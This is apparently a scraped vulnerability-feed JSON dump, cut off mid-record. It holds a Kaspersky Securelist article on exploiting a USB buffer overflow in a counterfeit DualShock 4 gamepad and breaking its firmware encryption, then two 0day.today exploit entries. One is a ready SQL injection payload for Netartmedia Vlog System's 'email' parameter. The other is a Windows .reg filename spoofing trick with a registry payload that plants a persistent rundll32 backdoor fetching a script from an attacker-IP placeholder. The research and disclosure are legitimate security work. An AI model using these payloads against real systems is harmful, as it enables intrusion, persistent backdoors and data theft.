{"securelist": [{"lastseen": "2019-03-21T17:10:08", "bulletinFamily": "blog", "description": "\n\nIn this article, I want to demonstrate extracting the firmware from a secure USB device running on the Cortex M0.\n\n## Who hacks video game consoles?\n\nThe manufacture of counterfeit and unlicensed products is widespread in the world of video game consoles. It's a multi-billion dollar industry in which demand creates supply. You can now find devices for almost all the existing consoles that allow you to play copies of licensed video game 'backups' from flash drives, counterfeit gamepads and accessories, various adapters, some of which give you an advantage over other players, and devices for the use of cheats in online and offline video games. There are even services that let you buy video game achievements without having to spend hours playing. Of course, this is all sold without the consent of the video game console manufacturers.\n\nModern video game consoles, just like 20 years ago, are proprietary systems where the rules are set by the hardware manufacturers, and not by the millions of customers using those devices. A variety of protective measures are included in their design to ensure these consoles only run signed code, so they only play licensed and legally acquired video games and all players have equal rights and only play with officially licensed accessories. In some countries it's even [illegal](<https://www.theverge.com/2015/10/27/9622560/jailbreak-video-game-console-sony-microsoft-dmca>) to try and hack **your own** video game console.\n\nBut at the same time the very scale of the protection makes these consoles an attractive target and one big 'crackme' for enthusiasts interested in information security and reverse engineering. The more difficult the puzzle, the more interesting it is to solve. Especially if you've grown up with a love for video games.\n\n## Protection scheme of DualShock 4\n\nReaders who follow my [twitter](<https://twitter.com/oct0xor>) account may know that I'm a long-time fan of reverse engineering video game consoles and everything related to them, including unofficial game devices. In the early days of PlayStation 4, a publicly known [vulnerability](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9322>) in the FreeBSD kernel (which PlayStation 4 is based on) let me and many other researchers take a look at the architecture and inner workings of the new game console from Sony. I carried out a lot different research, some of which included looking at how USB authentication works in PlayStation 4 and how it distinguishes licensed devices and blocks unauthorized devices. This subject was of interest because I had previously done similar research on [other consoles](<https://oct0xor.github.io/2017/05/03/xsm3/>). PlayStation 4's authentication scheme turned out to be much simpler than that used in Xbox 360, but no less effective.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094302/hacking-microcontroller-firmware-through-a-usb-1.png>)\n\n \n_Authorization scheme of PlayStation 4 USB accessories_\n\nPS4 sends 0x100 random bytes to DualShock 4 and in response the gamepad creates an RSASSA-PSS SHA-256 signature and sends it back among the cryptographic constants N and E (public key) needed to verify it. These constants are unique for all manufactured DualShock 4 gamepads. The gamepad also sends a signature needed for verification of N and E. It uses the same RSASSA-PSS SHA-256 algorithm, but the cryptographic constants are equal for all PlayStation 4 consoles and are stored in the kernel.\n\nThis means that if you want to authenticate your own USB device, it's not enough to hack the PlayStation 4 kernel \u2013 you need the private key stored inside the gamepad. And even if someone manages to hack a gamepad and obtains the private key, Sony can still blacklist the key with a firmware update. If after eight minutes a game console has not received an authentication response it stops communication with the gamepad and you need to remove it from the USB port and plug it in again to get it to work. That's how the early counterfeit gamepads worked by simulating a USB port unplug/plug process every eight minutes, and it was very annoying for anyone who bought them.\n\n## Rumors of super counterfeit DualShock 4\n\nThere were no signs of anyone hacking this authentication scheme for quite some time until I heard rumors about new fake gamepads on the market that looked and worked just like the original. I really wanted to take a look at them, so I ordered a few from Chinese stores.\n\nWhile I was waiting for my parcels to arrive, I decided to try and gather more information about counterfeit gamepads. After quite a few search requests I found a gamepad known as Gator Claw.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094257/hacking-microcontroller-firmware-through-a-usb-2.png>)\n\n \n_Unauthorized Gator Claw gamepad_\n\nThere was an interesting discussion on Reddit where people were saying that it worked just like other unauthorized gamepads but only for eight minutes, but that the developers had managed to fix this with a firmware update. The store included a link to the firmware update and a manual.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094257/hacking-microcontroller-firmware-through-a-usb-3.png>)\n\n \n_Firmware update manual for Gator Claw_\n\n## Basics of embedded firmware analysis\n\nThe first thing I did was to take a look at the resource section of the firmware updater executable.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094254/hacking-microcontroller-firmware-through-a-usb-4.png>)\n\n \n_Firmware found in resources of Gator Claw's firmware updater_\n\nReaders who are familiar with writing code for embedded devices will most likely recognize this file format. This is an Intel HEX file format which is commonly used for programming microcontrollers, and many compilers (for example GNU Compiler) may output compiled code in this format. Also, we can see that the beginning of the firmware doesn't have high entropy and sequences of bytes are easily recognizable. That means the firmware is not encrypted or compressed. After decoding the firmware from Intel HEX format and loading in hex editor (010 Editor is able to open files directly in that format) we are able to take a look at it. What architecture is it compiled for? ARM Cortex-M is so widely adopted that I recognize it straight away.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094256/hacking-microcontroller-firmware-through-a-usb-5.png>)\n\n \n_Gator Claw's firmware (left) and vector table of ARM Cortex-M (right)_\n\nAccording to the [specification](<http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0497a/BABIFJFG.html>)s, the first double word is the initial stack pointer and after that comes the table of exception vectors. The first double word in this table is Reset vector that is used as the firmware entry point. The high addresses of other exception handlers give an idea of the firmware's base address.\n\nBesides firmware, the resource section of the firmware updater also contained a configuration file with a description of different microcontrollers. The developers of the firmware updater most probably used publicly available source code from the manufacturers of microcontrollers, which would explain why this configuration file came with source code.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094252/hacking-microcontroller-firmware-through-a-usb-6.png>)\n\n \n_Configuration file with description of different microcontrollers_\n\nAfter searching the microcontroller identificators from the config file, we found the site of the manufacturer \u2013 Nuvoton. Product information among technical documentation and the SDK is freely available for download without any license agreements.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094248/hacking-microcontroller-firmware-through-a-usb-7.png>)\n\n \n_The site of the Nuvoton microcontroller manufacturer _\n\nAt this point we have the firmware, we know its architecture and microcontroller manufacturer, and we have information about the base address, initial stack pointer and entry point. We have more information than we actually need to load the firmware in IDA Pro and start analyzing it.\n\nARM processors have two different instruction sets: ARM (32 bit instructions) and Thumb (16-bit instructions extended with Thumb-2 32-bit instructions). Cortex-M0 supports only Thumb mode so we will switch the radio button in \"Processor options \u2013 Edit ARM architecture options \u2013 Set ARM instructions\" to \"NO\" when loading the firmware in IDA Pro.\n\nAfter that we can see the firmware has loaded at base address 0 and automatic analysis has recognized almost every function. The question now is how to move forward with the reverse engineering of the firmware?\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094240/hacking-microcontroller-firmware-through-a-usb-8.png>)\n\n \n_Example of one of the many firmware functions _\n\nIf we analyze the firmware, we'll see that throughout it performs read and write operations to memory with the base address 0x40000000. This is the base address of memory mapped input output (MMIO) registers. These MMIO registers allow you to access and control all the microcontroller's peripheral components. Everything that the firmware does happens through access to them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094233/hacking-microcontroller-firmware-through-a-usb-9.png>)\n\n \n_Memory map of peripheral controllers_\n\nBy searching through the technical documentation for the address 0x40000000 we find that this microcontroller belongs to the M451 family. Now that we know the family of the microcontroller, we are able to download the SDK and code samples for this platform. In the SDK we find a header file with a definition of all MMIO addresses, bit fields and structures. We can also compile code samples with all the libraries and compare them with functions in our IDB, or we can look for the names of the MMIO addresses in the source code and compare it with our disassembly. This makes the process of reverse engineering straightforward. That's because we know the architecture and model of the microcontroller and we have a definition of all MMIO registers. Analysis would be much more complicated if we didn't have this information. It's fair to say that is why many vendors only distribute the SDK after an NDA is signed.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094237/hacking-microcontroller-firmware-through-a-usb-10.png>)\n\n \n_Finding library functions in the firmware_\n\n## In the shadow of colossus\n\nI analyzed Gator Claw's firmware while waiting for my fake gamepad to arrive. There wasn't much of interest inside \u2013 authentication data is sent to another microcontroller accessible over I2C and the response is sent back to the console. The developers of this unlicensed gamepad knew that this firmware may be reverse engineered and the existence of more counterfeit gamepads may hurt their business. To prevent this, another microcontroller was used for the sole purpose of keeping secrets safe. And this is common practice. The hackers put a lot of effort into their product and don't want to be hacked too. What really caught my attention in this firmware was the presence of some seemingly unused string. Most likely it was meant to be part of a USB Device Descriptor but that particular descriptor was left unused. Was this string left on purpose? Is it some kind of signature? Quite probably, because this string is the name of a major hardware manufacturer best known for their logic analyzers. But it also turns out they have a gaming division that aims to be an original equipment manufacturer (OEM) and even has a number of patents related to the production of gaming accessories. Besides that, they also have subsidiary and their site has huge assortment of gaming accessories sold under a single brand. Among the products on sale are two dozen adapters that allow the gamepads of one console to be used with another console. For example, there's one product that lets you connect the gamepad of an Xbox 360 to PlayStation 4, another product that lets you connect a PlayStation 3 gamepad to Xbox One, and so on, including a universal 'all in one'. The list of products also includes adapters that allow you to connect a PC mouse and keyboard to the PS4, Xbox One and Nintendo Switch video game consoles, various gamepads and printed circuit boards to create your own arcade controllers for gaming consoles. All the products come with firmware updaters similar to the one that was provided for Gator Claw, but with one notable difference \u2013 all the firmware is encrypted.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094235/hacking-microcontroller-firmware-through-a-usb-11.png>)\n\n \n_Example of manual and encrypted firmware from resources for one of the products_\n\nThe printed circuit boards for creating your own arcade controllers let you take a look at PCB design without buying a device and taking it apart. Their design is most likely very close to that of Gator Claw. We can see two microcontrollers; one of them should be Nuvoton M451 and the other is an additional microcontroller to store secrets. All traces go to the microcontroller under black epoxy, so it should be the main microcontroller, and the microcontroller with the four yellow pins seems to have what's required to work over I2C.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094238/hacking-microcontroller-firmware-through-a-usb-12.png>)\n\n \n_Examples of product PCB design_\n\n## Revelations\n\nBy this time I had finally received my parcel from Shenzhen and this is what I found inside. I think you'll agree that the counterfeit gamepad looks exactly like the original DualShock 4. And it feels like it too. It's a wireless gamepad made with good quality materials and has a working touch pad, speaker and headset port.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094226/hacking-microcontroller-firmware-through-a-usb-13.png>)\n\n \n_Counterfeit DualShock 4 (from the outside)_\n\nI pressed one of the combinations found in the update instructions and powered it on. The gamepad booted into DFU mode! After connecting the gamepad to a PC in this mode it was recognized as another device with different identifiers and characteristics. I already knew what I was going to see inside\u2026\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094230/hacking-microcontroller-firmware-through-a-usb-14.png>)\n\n \n_Counterfeit DualShock 4 (view of main PCB)_\n\nI soldered a few wires to what looked like JTAG points and connected it to a JTAG programmer. The programming tool recognized the microcontroller, but a Security Lock was set.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094220/hacking-microcontroller-firmware-through-a-usb-15.png>)\n\n \n_Programming tool recognized microcontroller but Security Lock was enabled_\n\n## Hacking microcontroller firmware through a USB\n\nAfter this rather lengthy introduction, it's now time to return to the main subject of this article. USB (Universal Serial Bus) is an industry standard for peripheral devices. It's designed to be very flexible and allow a wide range of applications. USB protocol defines two entities \u2013 one host to whcih other devices connect. USB devices are divided into classes such as hub, human interface, printer, imaging, mass storage device and others.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094217/hacking-microcontroller-firmware-through-a-usb-16.png>)\n\n \n_Connection scheme of USB devices_\n\nData and control exchange between the devices with the host happens through a set of uni-directional or bi-directional pipes. By pipes we consider data transfers between host software and a particular endpoint on a USB device. One device may have many different endpoints to exchange different types of data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094220/hacking-microcontroller-firmware-through-a-usb-17.png>)\n\n \n_Data transfer types_\n\nThere are four different types of data transfers:\n\n * Control Transfers (used to configure a device)\n * Bulk Data Transfers (generated or consumed in relatively large and bursty quantities)\n * Interrupt Data Transfers (used for timely but reliable delivery of data)\n * Isochronous Data Transfers (occupy a prenegotiated amount of USB bandwidth with a prenegotiated delivery latency)\n\nAll USB devices must support a specially designated pipe at endpoint zero to which the USB device's control pipe will be attached.\n\nThose types of data transfers are implemented with the use of packets provided according to the scheme below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094211/hacking-microcontroller-firmware-through-a-usb-18.png>)\n\n \n_Packets used in USB protocol_\n\nIn fact, USB protocol is a state machine and in this article we are not going to examine all those packets. Below you can see an example of the packets used in a Control Transfer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094203/hacking-microcontroller-firmware-through-a-usb-19.png>)\n\n \n_Control Transfer_\n\nUSB devices may contain vulnerabilities when implementing Bulk Transfers, Interrupt Transfers, Isochronous Transfers, but those types of data transfers are optional and their presence and usage will vary from target to target. But all USB devices support Control Transfers. Their format is common and this makes this type of data transfer the most attractive to analyze for vulnerabilities.\n\nThe scheme below shows the format of the SETUP packet used to perform a Control Transfer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094208/hacking-microcontroller-firmware-through-a-usb-20.png>)\n\n \n_Format of SETUP packet_\n\nThe SETUP packet occupies 8 bytes and it can be used to obtain different types of data depending on the type of request. Some requests are common for all devices (for example GET DESCRIPTOR); others depend on the class of device and manufacturer permission. The length of data to send or receive is a 16-bit word provided in the SETUP packet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094205/hacking-microcontroller-firmware-through-a-usb-21.png>)\n\n \n_Examples of standard and class-specific requests_\n\nSumming up: Control Transfers use a very simple protocol that's supported by all USB devices. It can have lots of additional requests and we can control the size of data. All of that makes Control Transfers a perfect target for fuzzing and glitching.\n\n## Exploitation\n\nTo hack my counterfeit gamepad I didn't have to fuzz it because I found vulnerabilities while I was looking at the Gator Claw code.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094152/hacking-microcontroller-firmware-through-a-usb-22.png>)\n\n \n_Vulnerable code in handler of HID class requests_\n\nFunction **HID_ClassRequest()** is present to emulate the work of the original DualShock 4 gamepad and implements the bare minimum of required requests to get it working with PlayStation 4. **USBD_GetSetupPacket()** gets the SETUP packet and depending on the type of report it will either send data with the function **USBD_PrepareCntrlIn()** or will receive with the function **USBD_PrepareCntrlOut()**. This function doesn't check the length of the requested data and this should allow us to read part of the internal Flash memory where the firmware is located and also read and write to the beginning of SRAM memory.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094133/hacking-microcontroller-firmware-through-a-usb-23.png>)\n\n \n_Buffer overflow during Control Transfer_\n\nThe size of the DATA packet is defined in the USB Device Descriptor (also received with the Control Transfer), but what seems to be left unnoticed is the fact that this size defines the length of a single packet and there may be lots of packets depending on the length set in the SETUP packet.\n\nIt is noteworthy that the code samples provided on the site of Nuvoton also don't have checks for length and it could lead to the spread of similar bugs in all products that used this code as a reference.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094137/hacking-microcontroller-firmware-through-a-usb-24.png>)\n\n \n_Exploitation of buffer overflow in SRAM memory_\n\nSRAM (static random access memory) is a memory that among other things is occupied by stack. SRAM is often also executable memory (this is configurable). This is usually done to increase performance by making firmware copy pieces of code that are often called (for example, Real-Time Operating System) to SRAM. There is no guarantee that the top of the stack will be reachable by buffer overflow, but the chances of that are nevertheless high.\n\nSurprisingly, the main obstacle to exploiting USB firmware is the operating system. The following was observed while I was working with Windows, but I think most of it also applies to Linux without special patches.\n\nFirst of all, the operating system doesn't let you read more than [4 kb](<https://msdn.microsoft.com/en-us/data/ff538112\\(v=vs.71\\)>) during a Control Transfer. Secondly, in my experience the operating system doesn't let you write more than a single DATA packet during a Control Transfer. Thirdly, the USB device may have hidden requests and all attempts to use them will be blocked by the OS.\n\nThis is easy to demonstrate with human interface devices (HID), including gamepads. HIDs come with additional descriptors (HID Descriptor, Report Descriptor, Physical Descriptor). A Report Descriptor is quite different from the other descriptors and consists of different items that describe supported reports. If a report is missing from Report Descriptor, then the OS will refuse to complete it, even if it's handled in the device. This basically detracts from the discovery and exploitation of vulnerabilities in the firmware of USB devices and those nuances most probably prevented the discovery of vulnerabilities in the past.\n\nTo solve this problem without having to read and recompile the sources of the Linux kernel, I just used low end instruments that I had available at hand: Arduino Mega board and USB Host Shield (total < $30).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094132/hacking-microcontroller-firmware-through-a-usb-25.png>)\n\n \n_Connection scheme_\n\nAfter connecting devices with the above scheme, I used the Arduino board to perform a Control Transfer without any interference from the operating system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094144/hacking-microcontroller-firmware-through-a-usb-26.png>)\n\n \n_Arduino Mega + USB Host Shield_\n\nThe counterfeit gamepad had the same vulnerabilities as Gator Claw and the first thing I did was to dump part of the firmware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094126/hacking-microcontroller-firmware-through-a-usb-27.png>)\n\n \n_Partial dump of firmware_\n\nThe easiest way to find the base address of the firmware dump is to find a structure with pointers to known data. After that we can calculate the delta of addresses and load a partial dump of the firmware to IDA Pro.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094119/hacking-microcontroller-firmware-through-a-usb-28.png>)\n\n \n_Structure with pointers to known data_\n\nThe firmware dump allowed us to find out the address of the **printf() **function that outputs the information in UART required for factory quality assurance. More than that, I was able to find the **hexdump()** function in the dump, meaning I didn't even need to write shellcode.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094122/hacking-microcontroller-firmware-through-a-usb-29.png>)\n\n \n_Finding functions that aid exploitation_\n\nAfter locating the UART points on the printed circuit board of the gamepad, soldering wires and connecting them to a TTL2USB adapter, we can see the output in a serial terminal.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094119/hacking-microcontroller-firmware-through-a-usb-30.png>)\n\n \n_Standard UART output during gamepad boot_\n\nA standard library for Nuvoton microcontrollers comes with a very handy handler of Hard Fault exceptions that outputs a register dump. This greatly facilitates in exploitation and allows exploits to be debugged.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094122/hacking-microcontroller-firmware-through-a-usb-31.png>)\n\n \n_UART output after Hard Fault exception caused by stack overwrite _\n\nA final exploit to dump firmware can be seen in the screenshot below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094124/hacking-microcontroller-firmware-through-a-usb-32.png>)\n\n \n_Exploit and shellcode to dump firmware over UART_\n\nBut this way to dump firmware is not perfect because the microcontrollers of the Nuvoton M451 family may have two different types of firmware \u2013 main firmware (APROM) and mini-firmware for device firmware update (LDROM).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094159/hacking-microcontroller-firmware-through-a-usb-33.png>)\n\n \n_Memory map of flash memory and system memory in different modes_\n\nAPROM and LDROM are mapped at the same memory addresses and because of that it's only possible to dump one of them. To get a dump of LDROM firmware we need to disable the security lock and read the flash memory with a programming tool.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094159/hacking-microcontroller-firmware-through-a-usb-34.png>)\n\n \n_Shellcode that disables security lock_\n\n## Crypto fail\n\nAnalysis of the firmware responsible for updates (LDROM) revealed that it's mostly standard code from Nuvoton, but with added code to decrypt firmware updates.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094159/hacking-microcontroller-firmware-through-a-usb-35.png>)\n\n \n_Cryptographic algorithm scheme for decryption of firmware updates _\n\nThe cryptographic algorithm used for decrypting firmware updates is a custom block cipher. It is performed in cipher block chaining mode, but the block size is just 32 bits. This algorithm takes a key that is a textual (ascii) identificator of the product and array of instructions that define what transformation should be performed on the current block. After encountering the end of the key and array their current position is set to the initial position. The list of transformations includes six operations: xor, subtraction, subtraction (reverse), and the same operations but with the bytes swapped. Because the firmware contains large areas filled with zeroes, it makes it easy to calculate the secret parts of this algorithm.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094140/hacking-microcontroller-firmware-through-a-usb-36.png>)\n\n \n_Revealing the firmware update encryption key_\n\nApplying the algorithm extracted from the firmware of the counterfeit gamepad to all the firmware of the accessories found on the site of a major OEM manufacturer revealed that all of them use this encryption algorithm, and the weaknesses in this algorithm allowed us to calculate the encryption keys for all devices and decrypt their firmware updates. In other words, the algorithm used inside the counterfeit product led to the security of all the products developed by that manufacturer being compromised.\n\n## Conclusion\n\nThis blog post turned out to be quite long, but I really wanted to prepare it for a very wide audience. I have given a step-by-step guide on the analysis of embedded firmware, finding vulnerabilities and exploiting them to acquire a firmware dump and to carry out code execution on a USB device.\n\nThe subject of glitching attacks is not included in the scope of this article, but such attacks are also very effective against USB devices. For those who want to learn more about them, I recommend watching [this video](<https://www.youtube.com/watch?v=TeCQatNcF20>). For those wondering how pirates managed to acquire the algorithm and key from DualShock 4 to make their own devices, I suggest reading [this article](<https://fail0verflow.com/blog/2018/ps4-ds4/>).\n\nAs for the mystery of the auxiliary microcontroller that was used to keep secrets, I found out that it was not used in all devices and was only added for obscurity. This microcontroller doesn't keep any secrets and is only used for SHA1 and SHA256. This research also aids enthusiasts to create their own open source projects for use with game consoles.\n\nAs for buyers of counterfeit gamepads, they are not in an enviable position because manufacturers block illegally used keys and the users end up without a working gamepad or hints on where to get firmware updates.", "modified": "2019-03-21T16:00:02", "published": "2019-03-21T16:00:02", "id": "SECURELIST:31EA06D9A426C6D0FE0CB7F9ED575A6E", "href": "https://securelist.com/hacking-microcontroller-firmware-through-a-usb/89919/", "type": "securelist", "title": "Hacking microcontroller firmware through a USB", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2019-03-23T21:04:19", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-03-20T00:00:00", "published": "2019-03-20T00:00:00", "id": "1337DAY-ID-32399", "href": "https://0day.today/exploit/description/32399", "title": "Netartmedia Vlog System - email SQL Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Netartmedia Vlog System - 'email' SQL Injection\r\n# Exploit Author: Ahmet \u00dcmit BAYRAM\r\n# Vendor Homepage: https://www.netartmedia.net/vlogsystem/\r\n# Demo Site: https://www.phpscriptdemos.com/vlogs/\r\n# Version: Lastest\r\n# Tested on: Kali Linux\r\n# CVE: N/A\r\n----- PoC: SQLi -----\r\n# Request: http://localhost/[PATH]/index.php\r\n# Vulnerable Parameter: email (POST)\r\n# Attack\r\nPattern: ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password\n\n# 0day.today [2019-03-23] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32399"}, {"lastseen": "2019-03-14T10:42:25", "bulletinFamily": "exploit", "description": "The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user. This can potentially trick unsavvy users into choosing the wrong selection shown on the dialog box. Furthermore, we can deny the registry editor its ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful.", "modified": "2019-03-12T00:00:00", "published": "2019-03-12T00:00:00", "id": "1337DAY-ID-32347", "href": "https://0day.today/exploit/description/32347", "title": "Microsoft Windows .Reg File / Dialog Box Message Spoofing Exploit", "type": "zdt", "sourceData": "Microsoft Windows .Reg File / Dialog Box Message Spoofing\r\n\r\n[+] Credits: John Page (aka hyp3rlinx) \r\n\r\n[Vendor]\r\nwww.microsoft.com\r\n\r\n\r\n[Product]\r\nA file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values.\r\n.reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry.\r\n\r\n\r\n[Vulnerability Type]\r\nWindows .Reg File Dialog Box Message Spoofing\r\n\r\n\r\n[CVE Reference]\r\nN/A\r\n\r\n\r\n[Security Issue]\r\nThe Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user.\r\nThis can potentially trick unsavvy users into choosing the wrong selection shown on the dialog box. Furthermore, we can deny the registry editor\r\nits ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful.\r\n\r\nNormally when a user opens a .reg file UAC will launch (if user is run as Admin) if targeting a non privleged user we can still hijack HKCU reg settings\r\nwithout having to deal with UAC. After they will get the registry security warning dialog box asking them if they \"trust the source\" and\r\n\"Are you sure you want to continue?\" etc and will also have a choice of either 'Yes' or 'No' to select from.\r\n\r\nHowever, we can inject our own messages thru the filename to direct the user to wrongly click \"Yes\", as the expected \"Are you sure you want to continue?\"\r\ndialog box message is under our control. The registry dialog echoes back the filename plus any text we add and allows us to terminate part of its\r\ndefault security warning message. We achieve this using % encoded characters in the filename like %n or %r and %0.\r\n\r\nExample, the \"do not add it to the registry\" and \"Are you sure you want to continue?\" default warning messages can be done away with using %0.\r\n\r\nThis spoofing flaw lets us spoof the \"Are you sure you want to continue?\" warning message to instead read \"Click Yes\" or whatever else we like.\r\nPotentially making a user think they are cancelling the registry import as the security warning dialog box is now lying to them.\r\n\r\nDenial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10:\r\n------------------------------------------------------------------------------------------------\r\nTypically, upon a successful import the registry editor pops up another dialog box with a status message telling us\r\n\"the keys and values contained in <REGFILE> have been successfully added to the registry\".\r\n\r\nWe can obstruct that behavior to deny this secondary registry editor dialog from appearing by tacking on a (null) right before the\r\nend of our filename using %1 or %25 like: \"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg\"\r\n\r\nIf don't want to use (null) use %3 but it will display a asian char instead but still prevents the secondary registry dialog box you.\r\nYou will have to manually refresh the registry written to in order to see the values stored when using these dialog denial of service methods.\r\n\r\nNote: Denial of the secondary dialog box seems to only work on Windows 10.\r\n\r\nBehaviors I discovered playing with registry filenames that affect the dialog box, depending on Windows OS version you will get different results.\r\n\r\n% - can be used for obfuscation e.g. %h%a%t%e = hate\r\n%b will create white-space\r\n%n makes a newline\r\n%r makes a newline\r\n%1 creates (null) - important as we prevent the second registry dialog from appearing after a successful import!\r\n%0 Important terminates string\r\n%25 (Windows 10) creates (null) - Important as we prevent the second registry dialog from appearing after a successful import!\r\n%3 - Important as we prevent the second registry dialog from appearing after a successful import! (but shows asian char)\r\n%5 (Windows 10) duplicates the default registry dialog box message by \"n\" amount of times per amount of %5 injected into the filename \r\n%25 (Windows 7) duplicates the default registry dialog box message by \"n\" amount of times per amount of %25 injected into the filename \r\n%2525 prevents registry editor from opening\r\n%169 will show our junky filename in the dialog box (we don't want that)\r\n%3, %197, %17 and some others change the default language shown in the registry dialog box to asian characters etc\r\n\r\nEach injected character can be separated by a percent \"%\" sign without messing up our spoofed message, we can leverage this to obfuscate the end of the filename.\r\nWe then use %0 to terminate the message string so that the second .reg extension and default registry messages are not displayed in the registry dialog box.\r\n\r\nThe filename \"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg\" will show as \"Microsoft-Security-Update-v1.2-Windows-10.reg\"\r\nin the registry dialog box, along with our spoofed user directions.\r\n \r\nWhile this spoofing vulnerability requires user interaction and bypassing Windows UAC (if targeting Admin) prompt to succeed, the fact the we can prevent secondary\r\nregistry dialogs and modify registry messages displayed to the user makes it a viable attack vector. If we are successful in our attack we can achieve a persistent\r\nRCE backdoor all while the user thinks they have aborted the import. Moreover, targeting a non privileged user allows us to hijack programs and not worry about UAC.\r\n\r\n\r\n[POC Video URL]\r\nhttps://vimeo.com/322684636\r\n\r\n\r\n[Exploit/POC]\r\nPersistent Remote Code Execution Backdoor: \r\n\r\nThis will add entry to \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\iexplore.exe\"\r\nfor a persistent rundll32 payload targeting MSIE that references a JScript XML based file on our remote server.\r\n\r\n1) Create a Windows .REG Registry file named.\r\n\r\n\"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg\"\r\n\r\nRegistry file Contents.\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\iexplore.exe]\r\n\"debugger\"=\"rundll32.exe javascript:\\\"\\\\..\\\\mshtml,RunHTMLApplication \\\";document.write();GetObject(\\\"script:http://<ATTACKER-IP>/backdoor\\\")\"\r\n\r\n\r\n2) Create an XML file hosted at http://ATTACKER-IP/backdoor named simply as \"backdoor\" will execute Windows calc.exe when Microsoft Internet Explorer is launched.\r\n\r\n<?xml version=\"1.0\"?>\r\n<package>\r\n<component id=\"testCalc\">\r\n<script language=\"JScript\">\r\n<![CDATA[\r\nnew ActiveXObject(\"WScript.Shell\").Run(\"calc.exe\"); \r\n]]>\r\n</script>\r\n</component>\r\n</package>\r\n\r\n\r\n\r\n[Network Access]\r\nLocal\r\n\r\n\r\n[Severity]\r\nHigh\r\n\r\n\r\n[Disclosure Timeline]\r\nVendor Notification: March 1, 2019\r\nMSRC Response: \" A registry file was created with the title you suggested, but the error message was clear.\"\r\nThen vendor sent me a link pointing me to the \"Definition of a Security Vulnerability\" Lol.\r\nMarch 10, 2019 : Public Disclosure\n\n# 0day.today [2019-03-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32347"}, {"lastseen": "2019-03-09T14:29:23", "bulletinFamily": "exploit", "description": "Exploit for freebsd platform in category local exploits", "modified": 